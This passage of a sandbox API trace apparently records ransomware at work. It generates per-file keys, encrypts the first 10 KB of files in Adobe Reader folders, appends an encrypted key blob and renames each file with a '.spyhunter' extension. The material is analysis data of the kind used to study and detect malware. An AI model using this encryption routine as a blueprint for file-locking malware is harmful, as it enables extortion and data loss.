0x2c0000 [0179.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.983] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2c8*=0x30) returned 1 [0179.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e643c0 | out: hHeap=0x2c0000) returned 1 [0179.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2c8 | out: pbBuffer=0x25ce2c8) returned 1 [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2c0*=0x30) returned 1 [0179.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ESP" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63f60 | out: hHeap=0x2c0000) returned 1 [0179.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2c8 | out: pbBuffer=0x25ce2c8) returned 1 [0179.987] GetProcessHeap () returned 0x2c0000 [0179.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.988] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2c0*=0x30) returned 1 [0179.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.988] GetProcessHeap () returned 0x2c0000 [0179.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.988] GetProcessHeap () returned 0x2c0000 [0179.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63e80 | out: hHeap=0x2c0000) returned 1 [0179.988] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2c0 | out: pbBuffer=0x25ce2c0) returned 1 [0179.988] GetProcessHeap () returned 0x2c0000 [0179.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.988] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2b8*=0x30) returned 1 [0179.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.DEU" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e635c0 | out: hHeap=0x2c0000) returned 1 [0179.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2c0 | out: pbBuffer=0x25ce2c0) returned 1 [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2b8*=0x30) returned 1 [0179.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CHS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63be0 | out: hHeap=0x2c0000) returned 1 [0179.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2b8 | out: pbBuffer=0x25ce2b8) returned 1 [0179.992] GetProcessHeap () returned 0x2c0000 [0179.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2b0*=0x30) returned 1 [0179.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e63b00 | out: hHeap=0x2c0000) returned 1 [0179.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2b8 | out: pbBuffer=0x25ce2b8) returned 1 [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2b0*=0x30) returned 1 [0179.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f400 | out: hHeap=0x2c0000) returned 1 [0179.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2b0 | out: pbBuffer=0x25ce2b0) returned 1 [0179.993] GetProcessHeap () returned 0x2c0000 [0179.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2a8*=0x30) returned 1 [0179.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.994] GetProcessHeap () returned 0x2c0000 [0179.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.994] GetProcessHeap () returned 0x2c0000 [0179.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e73b28 | out: hHeap=0x2c0000) returned 1 [0179.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2b0 | out: pbBuffer=0x25ce2b0) returned 1 [0179.994] GetProcessHeap () returned 0x2c0000 [0179.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0179.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2a8*=0x30) returned 1 [0179.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.995] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm") returned 55 [0179.995] StrStrW (lpFirst="Viktig.htm", lpSrch=".txt") returned 0x0 [0179.995] GetProcessHeap () returned 0x2c0000 [0179.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.995] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce26c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce26c*=0x2800, lpOverlapped=0x0) returned 1 [0180.015] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.015] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce26c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce26c*=0x2800, lpOverlapped=0x0) returned 1 [0180.015] GetProcessHeap () returned 0x2c0000 [0180.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0180.015] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.016] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce26c, lpOverlapped=0x0 | out: lpBuffer=0x25ce2ac*, lpNumberOfBytesWritten=0x25ce26c*=0x4, lpOverlapped=0x0) returned 1 [0180.044] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce26c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce26c*=0x30, lpOverlapped=0x0) returned 1 [0180.044] CloseHandle (hObject=0x9c) returned 1 [0180.044] GetProcessHeap () returned 0x2c0000 [0180.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.044] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.spyhunter") returned 65 [0180.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm.spyhunter")) returned 1 [0180.046] GetProcessHeap () returned 0x2c0000 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.046] GetProcessHeap () returned 0x2c0000 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.046] GetProcessHeap () returned 0x2c0000 [0180.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bb50 | out: hHeap=0x2c0000) returned 1 [0180.046] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2a8 | out: pbBuffer=0x25ce2a8) returned 1 [0180.046] GetProcessHeap () returned 0x2c0000 [0180.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.046] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2a0*=0x30) returned 1 [0180.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.049] GetProcessHeap () returned 0x2c0000 [0180.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.049] GetProcessHeap () returned 0x2c0000 [0180.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8ac38 | out: hHeap=0x2c0000) returned 1 [0180.049] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2a8 | out: pbBuffer=0x25ce2a8) returned 1 [0180.049] GetProcessHeap () returned 0x2c0000 [0180.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.049] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce2a0*=0x30) returned 1 [0180.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.052] GetProcessHeap () returned 0x2c0000 [0180.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.052] GetProcessHeap () returned 0x2c0000 [0180.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a798 | out: hHeap=0x2c0000) returned 1 [0180.052] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2a0 | out: pbBuffer=0x25ce2a0) returned 1 [0180.052] GetProcessHeap () returned 0x2c0000 [0180.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.052] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce298*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce298*=0x30) returned 1 [0180.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.063] GetProcessHeap () returned 0x2c0000 [0180.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.063] GetProcessHeap () returned 0x2c0000 [0180.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a2f8 | out: hHeap=0x2c0000) returned 1 [0180.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce2a0 | out: pbBuffer=0x25ce2a0) returned 1 [0180.063] GetProcessHeap () returned 0x2c0000 [0180.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce298*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce298*=0x30) returned 1 [0180.063] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.064] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT") returned 97 [0180.064] StrStrW (lpFirst="CP1253.TXT", lpSrch=".txt") returned 0x0 [0180.064] GetProcessHeap () returned 0x2c0000 [0180.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0180.065] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce25c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce25c*=0x2414, lpOverlapped=0x0) returned 1 [0180.147] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffdbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.148] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2414, lpNumberOfBytesWritten=0x25ce25c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce25c*=0x2414, lpOverlapped=0x0) returned 1 [0180.148] GetProcessHeap () returned 0x2c0000 [0180.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0180.148] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.148] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce29c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce25c, lpOverlapped=0x0 | out: lpBuffer=0x25ce29c*, lpNumberOfBytesWritten=0x25ce25c*=0x4, lpOverlapped=0x0) returned 1 [0180.148] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce25c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce25c*=0x30, lpOverlapped=0x0) returned 1 [0180.148] CloseHandle (hObject=0xb0) returned 1 [0180.148] GetProcessHeap () returned 0x2c0000 [0180.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.148] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.spyhunter") returned 107 [0180.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt.spyhunter")) returned 1 [0180.149] GetProcessHeap () returned 0x2c0000 [0180.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.149] GetProcessHeap () returned 0x2c0000 [0180.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.149] GetProcessHeap () returned 0x2c0000 [0180.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3158 | out: hHeap=0x2c0000) returned 1 [0180.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce298 | out: pbBuffer=0x25ce298) returned 1 [0180.150] GetProcessHeap () returned 0x2c0000 [0180.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0180.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce290*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce290*=0x30) returned 1 [0180.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0180.156] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT") returned 95 [0180.156] StrStrW (lpFirst="THAI.TXT", lpSrch=".txt") returned 0x0 [0180.156] GetProcessHeap () returned 0x2c0000 [0180.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.156] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce254*=0x2800, lpOverlapped=0x0) returned 1 [0180.157] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.157] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce254*=0x2800, lpOverlapped=0x0) returned 1 [0180.157] GetProcessHeap () returned 0x2c0000 [0180.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.157] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.157] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x25ce294*, lpNumberOfBytesWritten=0x25ce254*=0x4, lpOverlapped=0x0) returned 1 [0180.160] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce254, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce254*=0x30, lpOverlapped=0x0) returned 1 [0180.160] CloseHandle (hObject=0xb0) returned 1 [0180.160] GetProcessHeap () returned 0x2c0000 [0180.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.160] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.spyhunter") returned 105 [0180.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt.spyhunter")) returned 1 [0180.161] GetProcessHeap () returned 0x2c0000 [0180.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.161] GetProcessHeap () returned 0x2c0000 [0180.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0180.161] GetProcessHeap () returned 0x2c0000 [0180.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 